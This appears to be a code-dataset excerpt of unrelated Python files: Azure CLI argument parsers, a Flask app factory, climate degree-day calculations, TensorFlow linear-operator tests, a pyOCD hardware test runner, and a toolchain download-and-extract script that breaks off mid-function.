ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a40a0289a7c3c48b6e6b0ff777374f6a624e925 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from collections import defaultdict
from knack.util import CLIError
class AddAutoScale(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.auto_scale = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'min-node-count':
d['min_node_count'] = v[0]
elif kl == 'enabled':
d['enabled'] = v[0]
elif kl == 'max-node-count':
d['max_node_count'] = v[0]
return d
class AddAutoPause(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.auto_pause = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'delay-in-minutes':
d['delay_in_minutes'] = v[0]
elif kl == 'enabled':
d['enabled'] = v[0]
return d
class AddLibraryRequirements(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.library_requirements = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'content':
d['content'] = v[0]
elif kl == 'filename':
d['filename'] = v[0]
return d
class AddSku(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.sku = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'tier':
d['tier'] = v[0]
elif kl == 'name':
d['name'] = v[0]
return d
class AddRecurringScans(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.recurring_scans = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
d['email_subscription_admins'] = True
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'is-enabled':
d['is_enabled'] = v[0]
elif kl == 'email-subscription-admins':
d['email_subscription_admins'] = v[0]
elif kl == 'emails':
d['emails'] = v
return d
class AddBaselineResults(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddBaselineResults, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'result':
d['result'] = v
return d
class AddDefaultDataLakeStorage(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.default_data_lake_storage = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'account-url':
d['account_url'] = v[0]
elif kl == 'filesystem':
d['filesystem'] = v[0]
return d
class AddConnectivityEndpoints(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.connectivity_endpoints = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
v = properties[k]
d[k] = v[0]
return d
class AddPrivateEndpointConnections(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddPrivateEndpointConnections, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'status':
d['status'] = v[0]
elif kl == 'description':
d['description'] = v[0]
return d
|
py | 1a40a10d6ffb4a4fc95b0bf18532e3accf272430 | # app/__init__.py
import os
from flask import Flask, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_bootstrap import Bootstrap
db = SQLAlchemy()
bootstrap = Bootstrap()
login_manager = LoginManager()
login_manager.login_view = 'authentication.do_the_login'
login_manager.session_protection = 'strong'
bcrypt = Bcrypt()
def page_not_found(e):
return render_template('error404.html'), 404
def create_app(config_type): # dev, test ou prod
app = Flask(__name__)
configuration = os.path.join(os.getcwd(),'config', config_type + '.py')
app.config.from_pyfile(configuration)
app.register_error_handler(404, page_not_found)
db.init_app(app)
bootstrap.init_app(app)
login_manager.init_app(app)
bcrypt.init_app(app)
from app.cadastros import main #caminho para app/cadastros
app.register_blueprint(main)
from app.auth import authentication
app.register_blueprint(authentication)
from app.tc import termos
app.register_blueprint(termos)
from app.busca import buscar
app.register_blueprint(buscar)
return app
|
py | 1a40a216f40fc7c4ca119e6f3b7abacf9c4ae475 | import xarray as xr
import numpy as np
from climate_toolbox.utils.utils import \
remove_leap_days, convert_kelvin_to_celsius
def snyder_edd(tasmin, tasmax, threshold):
r"""
Snyder exceedance degree days/cooling degree days
Similarly to Snyder HDDs, Snyder exceedance degree days for any given day
are given by the integral between the sinosiod-interpolated temperature and
the threshold.
The closed form solution is given by:
.. math::
EDD_{P} = \sum_{d \in P} EDD_d
where
.. math::
EED_d =
\begin{cases}
( (M - e)(\pi /2 - \theta) + w \cos(\theta) ) / \pi, & \text{if } tmin_d < e < tmax_d \\
0 , & \text{if } tmax_d < e \\
M - e, & \text{otherwise}
\end{cases}
and
.. math::
\begin{array}{rll}
M & = & (tmax_d + tmin_d)/2 \\
w & = & (tmax_d-tmin_d)/2 \\
\theta & = & \arcsin( (e-M)/w ) \\
\end{array}
Parameters
----------
tasmin : xarray.DataArray
Daily minimum temperature (degrees C)
tasmax : xarray.DataArray
Daily maximum temperature (degrees C)
threshold : int, float, xarray.DataArray
Threshold (degrees C)
Returns
-------
edd : xarray.DataArray
Snyder exceedance degree days (degreedays)
"""
# Check for unit agreement
assert tasmin.units == tasmax.units
# check to make sure tasmax > tasmin everywhere
assert not (tasmax < tasmin).any(), "values encountered where tasmin > tasmax"
# compute useful quantities for use in the transformation
snyder_mean = ((tasmax + tasmin)/2)
snyder_width = ((tasmax - tasmin)/2)
snyder_theta = xr.ufuncs.arcsin((threshold - snyder_mean)/snyder_width)
# the trasnformation is computed using numpy arrays, taking advantage of
# numpy's second where clause. Note that in the current dev build of
# xarray, xr.where allows this functionality. As soon as this goes live,
# this block can be replaced with xarray
res = xr.where(
tasmin < threshold,
xr.where(
tasmax > threshold,
((snyder_mean - threshold) * (np.pi/2 - snyder_theta)
+ (snyder_width * np.cos(snyder_theta))) / np.pi,
0),
snyder_mean - threshold)
res.attrs['units'] = (
'degreedays_{}{}'.format(threshold, tasmax.attrs['units']))
return res
def snyder_gdd(tasmin, tasmax, threshold_low, threshold_high):
r"""
Snyder growing degree days
Growing degree days are the difference between EDD measures at two
thresholds.
.. math::
{GDD}_{T_{low}, T_{high}, y, i} = {EDD}_{T_{low}, y, i} - {EDD}_{T_{high}, y, i}
Note that where :math:`tas_{d,i}>{T_{high}}`, GDD will be a constant value
:math:`T_{high}-T_{low}`. Thus, this measure is only useful when another
measure, e.g. :math:`{EDD}_{T_{high}}`, sometimes referred to as
*killing degree days*, is used as an additional predictor.
Parameters
----------
tasmin : xarray.DataArray
Daily minimum temperature (degrees C)
tasmax : xarray.DataArray
Daily maximum temperature (degrees C)
threshold_low : int, float, xarray.DataArray
Lower threshold (degrees C)
threshold_high : int, float, xarray.DataArray
Upper threshold (degrees C)
Returns
-------
gdd : xarray.DataArray
Snyder growing degree days (degreedays)
"""
# Check for unit agreement
assert tasmin.units == tasmax.units
res = (
snyder_edd(tasmin, tasmax, threshold_low)
- snyder_edd(tasmin, tasmax, threshold_high))
res.attrs['units'] = (
'degreedays_{}-{}{}'.format(threshold_low, threshold_high, tasmax.attrs['units']))
return res
def validate_edd_snyder_agriculture(ds, thresholds):
msg_null = 'hierid dims do not match 24378'
assert ds.hierid.shape == (24378,), msg_null
for threshold in thresholds:
assert threshold in list(ds.refTemp)
return
def tas_poly(ds, power, varname):
"""
Daily average temperature (degrees C), raised to a power
Leap years are removed before counting days (uses a 365 day
calendar).
"""
powername = ordinal(power)
description = ('''
Daily average temperature (degrees C){raised}
Leap years are removed before counting days (uses a 365 day
calendar).
'''.format(
raised='' if power == 1 else (
' raised to the {powername} power'
.format(powername=powername)))).strip()
ds1 = xr.Dataset()
# remove leap years
ds = remove_leap_days(ds)
# do transformation
ds1[varname] = (ds.tas - 273.15)**power
# Replace datetime64[ns] 'time' with YYYYDDD int 'day'
if ds.dims['time'] > 365:
raise ValueError
ds1.coords['day'] = ds['time.year']*1000 + np.arange(1, len(ds.time)+1)
ds1 = ds1.swap_dims({'time': 'day'})
ds1 = ds1.drop('time')
ds1 = ds1.rename({'day': 'time'})
# document variable
ds1[varname].attrs['units'] = (
'C^{}'.format(power) if power > 1 else 'C')
ds1[varname].attrs['long_title'] = description.splitlines()[0]
ds1[varname].attrs['description'] = description
ds1[varname].attrs['variable'] = varname
return ds1
def ordinal(n):
""" Converts numbers into ordinal strings """
return (
"%d%s" %
(n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]))
|
py | 1a40a29ec6a040ca3d98e0b27492b1379d30cb4b | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
linalg = linalg_lib
random_seed.set_random_seed(23)
class SquareLinearOperatorFullMatrixTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_positive_definite_matrix(
shape, dtype)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
# Matrix with two positive eigenvalues.
matrix = [[1., 0.], [1., 11.]]
operator = linalg.LinearOperatorFullMatrix(
matrix,
is_positive_definite=True,
is_non_singular=True,
is_self_adjoint=False)
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertFalse(operator.is_self_adjoint)
# Auto-detected.
self.assertTrue(operator.is_square)
def test_assert_non_singular_raises_if_cond_too_big_but_finite(self):
with self.test_session():
tril = linear_operator_test_util.random_tril_matrix(
shape=(50, 50), dtype=np.float32)
diag = np.logspace(-2, 2, 50).astype(np.float32)
tril = array_ops.matrix_set_diag(tril, diag)
matrix = math_ops.matmul(tril, tril, transpose_b=True).eval()
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.assertRaisesOpError("Singular matrix"):
# Ensure that we have finite condition number...just HUGE.
cond = np.linalg.cond(matrix)
self.assertTrue(np.isfinite(cond))
self.assertGreater(cond, 1e12)
operator.assert_non_singular().run()
def test_assert_non_singular_raises_if_cond_infinite(self):
with self.test_session():
matrix = [[1., 1.], [1., 1.]]
# We don't pass the is_self_adjoint hint here, which means we take the
# generic code path.
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.assertRaisesOpError("Singular matrix"):
operator.assert_non_singular().run()
def test_assert_self_adjoint(self):
matrix = [[0., 1.], [0., 1.]]
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.test_session():
with self.assertRaisesOpError("not equal to its adjoint"):
operator.assert_self_adjoint().run()
def test_assert_positive_definite(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(matrix, is_self_adjoint=True)
with self.test_session():
with self.assertRaisesOpError("Cholesky decomposition was not success"):
operator.assert_positive_definite().run()
class SquareLinearOperatorFullMatrixSymmetricPositiveDefiniteTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest.
In this test, the operator is constructed with hints that invoke the use of
a Cholesky decomposition for solves/determinant.
"""
def setUp(self):
# Increase from 1e-6 to 1e-5. This reduction in tolerance happens,
# presumably, because we are taking a different code path in the operator
# and the matrix. The operator uses a Choleksy, the matrix uses standard
# solve.
self._atol[dtypes.float32] = 1e-5
self._rtol[dtypes.float32] = 1e-5
self._atol[dtypes.float64] = 1e-10
self._rtol[dtypes.float64] = 1e-10
@property
def _dtypes_to_test(self):
return [dtypes.float32, dtypes.float64]
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_positive_definite_matrix(
shape, dtype, force_well_conditioned=True)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
# Matrix with two positive eigenvalues.
matrix = [[1., 0.], [0., 7.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_positive_definite=True, is_self_adjoint=True)
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_self_adjoint)
# Should be auto-set
self.assertTrue(operator.is_non_singular)
self.assertTrue(operator._can_use_cholesky)
self.assertTrue(operator.is_square)
def test_assert_non_singular(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
# Cholesky decomposition may fail, so the error is not specific to
# non-singular.
with self.assertRaisesOpError(""):
operator.assert_non_singular().run()
def test_assert_self_adjoint(self):
matrix = [[0., 1.], [0., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
with self.assertRaisesOpError("not equal to its adjoint"):
operator.assert_self_adjoint().run()
def test_assert_positive_definite(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
# Cholesky decomposition may fail, so the error is not specific to
# non-singular.
with self.assertRaisesOpError(""):
operator.assert_positive_definite().run()
class NonSquareLinearOperatorFullMatrixTest(
linear_operator_test_util.NonSquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_normal(shape, dtype=dtype)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
matrix = [[3., 2., 1.], [1., 1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix,
is_self_adjoint=False)
self.assertEqual(operator.is_positive_definite, None)
self.assertEqual(operator.is_non_singular, None)
self.assertFalse(operator.is_self_adjoint)
self.assertFalse(operator.is_square)
def test_matrix_must_have_at_least_two_dims_or_raises(self):
with self.assertRaisesRegexp(ValueError, "at least 2 dimensions"):
linalg.LinearOperatorFullMatrix([1.])
if __name__ == "__main__":
test.main()
|
py | 1a40a2d5db5db701ef5a7a7cbfda34b09d1751a0 | #!/usr/bin/env python
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import sys
import logging
from time import time
import argparse
from xml.etree import ElementTree
import multiprocessing as mp
import io
from pyocd.core.session import Session
from pyocd.core.helpers import ConnectHelper
from pyocd.utility.conversion import float32_to_u32
from pyocd.probe.aggregator import DebugProbeAggregator
from test_util import (
get_env_file_name,
TestResult,
Test,
IOTee,
RecordingLogHandler,
get_session_options,
ensure_output_dir,
TEST_OUTPUT_DIR,
)
from basic_test import BasicTest
from speed_test import SpeedTest
from cortex_test import CortexTest
from flash_test import FlashTest
from flash_loader_test import FlashLoaderTest
from gdb_test import GdbTest
from json_lists_test import JsonListsTest
from connect_test import ConnectTest
from debug_context_test import DebugContextTest
from concurrency_test import ConcurrencyTest
from commands_test import CommandsTest
XML_RESULTS_TEMPLATE = "test_results{}.xml"
LOG_FILE_TEMPLATE = "automated_test_result{}.txt"
SUMMARY_FILE_TEMPLATE = "automated_test_summary{}.txt"
LOG_FORMAT = "%(relativeCreated)07d:%(levelname)s:%(module)s:%(message)s"
JOB_TIMEOUT = 30 * 60 # 30 minutes
# Put together list of all tests.
all_tests = [
BasicTest(),
JsonListsTest(),
ConnectTest(),
SpeedTest(),
CortexTest(),
ConcurrencyTest(),
FlashTest(),
FlashLoaderTest(),
DebugContextTest(),
GdbTest(),
CommandsTest(),
]
# Actual list used at runtime, filted by command line args.
test_list = []
def print_summary(test_list, result_list, test_time, output_file=None):
for test in test_list:
test.print_perf_info(result_list, output_file=output_file)
Test.print_results(result_list, output_file=output_file)
print("", file=output_file)
print("Test Time: %.3f" % test_time, file=output_file)
if Test.all_tests_pass(result_list):
print("All tests passed", file=output_file)
else:
print("One or more tests has failed!", file=output_file)
def split_results_by_board(result_list):
boards = {}
for result in result_list:
if result.board_name in boards:
boards[result.board_name].append(result)
else:
boards[result.board_name] = [result]
return boards
def generate_xml_results(result_list):
board_results = split_results_by_board(result_list)
suite_id = 0
total_failures = 0
total_tests = 0
total_time = 0
root = ElementTree.Element('testsuites',
name="pyocd"
)
root.text = "\n"
for board_name, results in board_results.items():
total = 0
failures = 0
suite_time = 0
suite = ElementTree.SubElement(root, 'testsuite',
name=board_name,
id=str(suite_id))
suite.text = "\n"
suite.tail = "\n"
suite_id += 1
for result in results:
total += 1
if not result.passed:
failures += 1
case = result.get_test_case()
suite.append(case)
suite_time += result.time
suite.set('tests', str(total))
suite.set('failures', str(failures))
suite.set('time', "%.3f" % suite_time)
total_tests += total
total_failures += failures
total_time += suite_time
root.set('tests', str(total_tests))
root.set('failures', str(total_failures))
root.set('time', "%.3f" % total_time)
xml_results = os.path.join(TEST_OUTPUT_DIR, XML_RESULTS_TEMPLATE.format(get_env_file_name()))
ElementTree.ElementTree(root).write(xml_results, encoding="UTF-8", xml_declaration=True)
def print_board_header(outputFile, board, n, includeDividers=True, includeLeadingNewline=False):
header = "TESTING BOARD {name} [{target}] [{uid}] #{n}".format(
name=board.name, target=board.target_type, uid=board.unique_id, n=n)
if includeDividers:
divider = "=" * len(header)
if includeLeadingNewline:
print("\n" + divider, file=outputFile)
else:
print(divider, file=outputFile)
print(header, file=outputFile)
if includeDividers:
print(divider + "\n", file=outputFile)
def test_board(board_id, n, loglevel, logToConsole, commonLogFile):
"""! @brief Run all tests on a given board.
When multiple test jobs are being used, this function is the entry point executed in
child processes.
Always writes both stdout and log messages of tests to a board-specific log file, and saves
the output for each test to a string that is stored in the TestResult object. Depending on
the logToConsole and commonLogFile parameters, output may also be copied to the console
(sys.stdout) and/or a common log file for all boards.
@param board_id Unique ID of the board to test.
@param n Unique index of the test run.
@param loglevel Log level passed to logger instance. Usually INFO or DEBUG.
@param logToConsole Boolean indicating whether output should be copied to sys.stdout.
@param commonLogFile If not None, an open file object to which output should be copied.
"""
probe = DebugProbeAggregator.get_probe_with_id(board_id)
assert probe is not None
session = Session(probe, **get_session_options())
board = session.board
originalStdout = sys.stdout
originalStderr = sys.stderr
# Set up board-specific output file. A previously existing file is removed.
env_name = (("_" + os.environ['TOX_ENV_NAME']) if ('TOX_ENV_NAME' in os.environ) else '')
name_info = "{}_{}_{}".format(env_name, board.name, n)
log_filename = os.path.join(TEST_OUTPUT_DIR, LOG_FILE_TEMPLATE.format(name_info))
if os.path.exists(log_filename):
os.remove(log_filename)
# Skip board if specified in the config.
if session.options['skip_test']:
print("Skipping board %s due as specified in config" % board.unique_id)
return []
# Skip this board if we don't have a test binary.
if board.test_binary is None:
print("Skipping board %s due to missing test binary" % board.unique_id)
return []
# Open board-specific output file. This is done after skipping so a skipped board doesn't have a
# log file created for it (but a previous log file will be removed, above).
log_file = open(log_filename, "w", buffering=1) # 1=Line buffered
# Setup logging.
log_handler = RecordingLogHandler(None)
log_handler.setFormatter(logging.Formatter(LOG_FORMAT))
root_logger = logging.getLogger()
root_logger.setLevel(loglevel)
root_logger.addHandler(log_handler)
result_list = []
try:
# Write board header to board log file, common log file, and console.
print_board_header(log_file, board, n)
if commonLogFile:
print_board_header(commonLogFile, board, n, includeLeadingNewline=(n != 0))
print_board_header(originalStdout, board, n, logToConsole, includeLeadingNewline=(n != 0))
# Run all tests on this board.
for test in test_list:
print("{} #{}: starting {}...".format(board.name, n, test.name), file=originalStdout)
# Set a unique port for the GdbTest.
if isinstance(test, GdbTest):
test.n = n
# Create a StringIO object to record the test's output, an IOTee to copy
# output to both the log file and StringIO, then set the log handler and
# stdio to write to the tee.
testOutput = io.StringIO()
tee = IOTee(log_file, testOutput)
if logToConsole:
tee.add(originalStdout)
if commonLogFile is not None:
tee.add(commonLogFile)
log_handler.stream = tee
sys.stdout = tee
sys.stderr = tee
test_start = time()
result = test.run(board)
test_stop = time()
result.time = test_stop - test_start
tee.flush()
result.output = testOutput.getvalue()
result_list.append(result)
passFail = "PASSED" if result.passed else "FAILED"
print("{} #{}: finished {}... {} ({:.3f} s)".format(
board.name, n, test.name, passFail, result.time),
file=originalStdout)
finally:
# Restore stdout/stderr in case we're running in the parent process (1 job).
sys.stdout = originalStdout
sys.stderr = originalStderr
root_logger.removeHandler(log_handler)
log_handler.flush()
log_handler.close()
return result_list
def filter_tests(args):
"""! @brief Generate the list of tests to run based on arguments."""
if args.exclude_tests and args.include_tests:
print("Please only include or exclude tests, not both simultaneously.")
sys.exit(1)
excludes = [t.strip().lower() for t in args.exclude_tests.split(',')] if args.exclude_tests else []
includes = [t.strip().lower() for t in args.include_tests.split(',')] if args.include_tests else []
for test in all_tests:
if excludes:
include_it = (test.name.lower() not in excludes)
elif includes:
include_it = (test.name.lower() in includes)
else:
include_it = True
if include_it:
test_list.append(test)
def main():
parser = argparse.ArgumentParser(description='pyOCD automated testing')
parser.add_argument('-d', '--debug', action="store_true", help='Enable debug logging')
parser.add_argument('-q', '--quiet', action="store_true", help='Hide test progress for 1 job')
parser.add_argument('-j', '--jobs', action="store", default=1, type=int, metavar="JOBS",
help='Set number of concurrent board tests (default is 1)')
parser.add_argument('-b', '--board', action="append", metavar="ID", help="Limit testing to boards with specified unique IDs. Multiple boards can be listed.")
parser.add_argument('-l', '--list-tests', action="store_true", help="Print a list of tests that will be run.")
parser.add_argument('-x', '--exclude-tests', metavar="TESTS", default="", help="Comma-separated list of tests to exclude.")
parser.add_argument('-i', '--include-tests', metavar="TESTS", default="", help="Comma-separated list of tests to include.")
args = parser.parse_args()
# Allow CI to override the number of concurrent jobs.
if 'CI_JOBS' in os.environ:
args.jobs = int(os.environ['CI_JOBS'])
filter_tests(args)
if args.list_tests:
for test in test_list:
print(test.name)
return
# Disable multiple jobs on macOS prior to Python 3.4. By default, multiprocessing uses
# fork() on Unix, which doesn't work on the Mac because CoreFoundation requires exec()
# to be used in order to init correctly (CoreFoundation is used in hidapi). Only on Python
# version 3.4+ is the multiprocessing.set_start_method() API available that lets us
# switch to the 'spawn' method, i.e. exec().
if args.jobs > 1 and sys.platform.startswith('darwin') and sys.version_info[0:2] < (3, 4):
print("WARNING: Cannot support multiple jobs on macOS prior to Python 3.4. Forcing 1 job.")
args.jobs = 1
ensure_output_dir()
# Setup logging based on concurrency and quiet option.
level = logging.DEBUG if args.debug else logging.INFO
if args.jobs == 1 and not args.quiet:
log_file = os.path.join(TEST_OUTPUT_DIR, LOG_FILE_TEMPLATE.format(get_env_file_name()))
# Create common log file.
if os.path.exists(log_file):
os.remove(log_file)
logToConsole = True
commonLogFile = open(log_file, "a")
else:
logToConsole = False
commonLogFile = None
board_list = []
result_list = []
# Put together list of boards to test
board_list = ConnectHelper.get_all_connected_probes(blocking=False)
board_id_list = sorted(b.unique_id for b in board_list)
# Filter boards.
if args.board:
board_id_list = [b for b in board_id_list if any(c for c in args.board if c.lower() in b.lower())]
# If only 1 job was requested, don't bother spawning processes.
start = time()
if args.jobs == 1:
for n, board_id in enumerate(board_id_list):
result_list += test_board(board_id, n, level, logToConsole, commonLogFile)
else:
# Create a pool of processes to run tests.
try:
pool = mp.Pool(args.jobs)
# Issue board test job to process pool.
async_results = [pool.apply_async(test_board, (board_id, n, level, logToConsole, commonLogFile))
for n, board_id in enumerate(board_id_list)]
# Gather results.
for r in async_results:
result_list += r.get(timeout=JOB_TIMEOUT)
finally:
pool.close()
pool.join()
stop = time()
test_time = (stop - start)
print_summary(test_list, result_list, test_time)
summary_file = os.path.join(TEST_OUTPUT_DIR, SUMMARY_FILE_TEMPLATE.format(get_env_file_name()))
with open(summary_file, "w") as output_file:
print_summary(test_list, result_list, test_time, output_file)
generate_xml_results(result_list)
exit_val = 0 if Test.all_tests_pass(result_list) else -1
exit(exit_val)
#TODO - check if any threads are still running?
if __name__ == "__main__":
# set_start_method is only available in Python 3.4+.
if sys.version_info[0:2] >= (3, 4):
mp.set_start_method('spawn')
main()
|
py | 1a40a2dc3f9e69968e1c2fb484dc1a9fc534add5 | #!/usr/bin/env python3
import os, sys
import json
from pathlib import Path
import requests
from time import time
from tempfile import gettempdir
import tarfile
import concurrent
from concurrent.futures import ThreadPoolExecutor
import pkg_resources
## Just perform a sanity check on hit caches:
toolchains_file = Path("./toolchains.yaml")
toolchains = None
toolchains_dir = Path.home() / "toolchains"
if os.getenv("CACHED_SETUP_TOOLCHAINS") == 'true' :
sys.exit(0)
# Check if we are running in a development version
#
if toolchains_file.exists():
from ruamel.yaml import YAML
yaml = YAML(typ="safe")
toolchains = yaml.load(toolchains_file)
else:
toolchains_str = pkg_resources.resource_string(__name__, "toolchains.json")
toolchains = json.loads(toolchains_str)
def download_chunks(tc):
url = tc.get("url")
tarfile = f"{tc.get('release')}.tgz"
local_filename = Path(gettempdir()) / tarfile
print(url)
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(local_filename, "wb") as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
return local_filename
"""
This assumes the resulting tar file already has a top level directory for now.
"""
def extract_as_tar(tc, tar):
to_path = toolchains_dir
tc_dir = Path(to_path) / tc.get("release")
with tarfile.open(tar, "r:*") as tar:
tar.extractall(path=to_path)
return tc_dir
def main():
with ThreadPoolExecutor(max_workers=len(toolchains) + 1) as executor:
tasks = {executor.submit(download_chunks, tc): tc for tc in toolchains}
print(tasks)
files = []
for future in concurrent.futures.as_completed(tasks):
tc = tasks[future]
try:
dl = future.result()
files.append(dl)
except Exception as exc:
print("%r generated an exception: %s" % (tc, exc))
tc_paths = []
with ThreadPoolExecutor(max_workers=len(toolchains) + 1) as executor:
tasks = {
executor.submit(extract_as_tar, tc, file): tc
for (tc, file) in zip(toolchains, files)
}
for future in concurrent.futures.as_completed(tasks):
try:
tc_paths.append(future.result())
except Exception as exc:
print("Uh oh %s" % exc )
## Add PATHS to the envrionment
expand_path = os.pathsep.join(str(p) for p in tc_paths)
